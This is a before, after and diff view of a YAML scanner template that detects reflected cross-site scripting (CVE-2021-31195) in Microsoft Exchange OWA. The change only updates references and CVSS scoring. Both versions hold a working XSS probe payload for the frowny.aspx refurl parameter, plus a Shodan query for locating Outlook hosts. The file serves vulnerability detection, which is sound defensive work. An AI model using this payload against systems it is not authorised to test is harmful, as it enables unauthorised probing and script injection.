vulnerabilities/other/ms-exchange-server-reflected-xss.yaml (before)
id: CVE-2021-31195

info:
  name: Microsoft Exchange Server - Cross-Site Scripting
  author: infosecsanyam
  severity: high
  description: Microsoft Exchange Server, or OWA, is vulnerable to a cross-site scripting vulnerability in refurl parameter of frowny.asp.
  reference:
    - https://blog.orange.tw/2021/08/proxyoracle-a-new-attack-surface-on-ms-exchange-part-2.html
    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31195
    - https://nvd.nist.gov/vuln/detail/CVE-2021-31195
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
    cve-id: CVE-2021-31195
  metadata:
    shodan-query: http.title:"Outlook"
  tags: microsoft,exchange,owa,xss

requests:
  - method: GET
    path:
      - '{{BaseURL}}/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\&refurl=}}};alert(document.domain)//'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'alert(document.domain)//&et=ServerError'
          - 'mail/bootr.ashx'
        condition: and

      - type: status
        status:
          - 500

      - type: word
        words:
          - "text/html"
        part: header

# Enhanced by cs 09/23/2022

vulnerabilities/other/ms-exchange-server-reflected-xss.yaml (after)
id: CVE-2021-31195

info:
  name: Microsoft Exchange Server - Cross-Site Scripting
  author: infosecsanyam
  severity: high
  description: Microsoft Exchange Server, or OWA, is vulnerable to a cross-site scripting vulnerability in refurl parameter of frowny.asp.
  reference:
    - https://blog.orange.tw/2021/08/proxyoracle-a-new-attack-surface-on-ms-exchange-part-2.html
    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31195
    - https://nvd.nist.gov/vuln/detail/CVE-2021-31195
    - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31195
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2021-31195
    cwe-id: CWE-79
  metadata:
    shodan-query: http.title:"Outlook"
  tags: microsoft,exchange,owa,xss

requests:
  - method: GET
    path:
      - '{{BaseURL}}/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\&refurl=}}};alert(document.domain)//'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'alert(document.domain)//&et=ServerError'
          - 'mail/bootr.ashx'
        condition: and

      - type: status
        status:
          - 500

      - type: word
        words:
          - "text/html"
        part: header

# Enhanced by cs 09/23/2022

vulnerabilities/other/ms-exchange-server-reflected-xss.yaml (diff)
@@ -9,11 +9,12 @@ info:
     - https://blog.orange.tw/2021/08/proxyoracle-a-new-attack-surface-on-ms-exchange-part-2.html
     - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31195
     - https://nvd.nist.gov/vuln/detail/CVE-2021-31195
+    - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31195
   classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
-    cvss-score: 7.2
-    cwe-id: CWE-79
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
     cve-id: CVE-2021-31195
+    cwe-id: CWE-79
   metadata:
     shodan-query: http.title:"Outlook"
   tags: microsoft,exchange,owa,xss
